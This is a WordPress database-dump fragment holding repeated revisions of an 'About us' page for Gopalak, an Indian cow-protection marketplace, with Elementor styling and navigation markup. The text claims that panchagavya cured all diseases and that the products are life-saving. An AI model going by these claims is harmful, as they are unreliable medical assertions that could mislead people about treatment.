https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 10:36:00','2022-10-28 05:06:00','',1804,'https://gopalak.in/?p=1996',0,'revision','',0),(1997,1,'2022-10-28 10:36:00','2022-10-28 05:06:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 10:36:00','2022-10-28 05:06:00','',1804,'https://gopalak.in/?p=1997',0,'revision','',0),(1998,1,'2022-10-28 10:36:00','2022-10-28 05:06:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.ele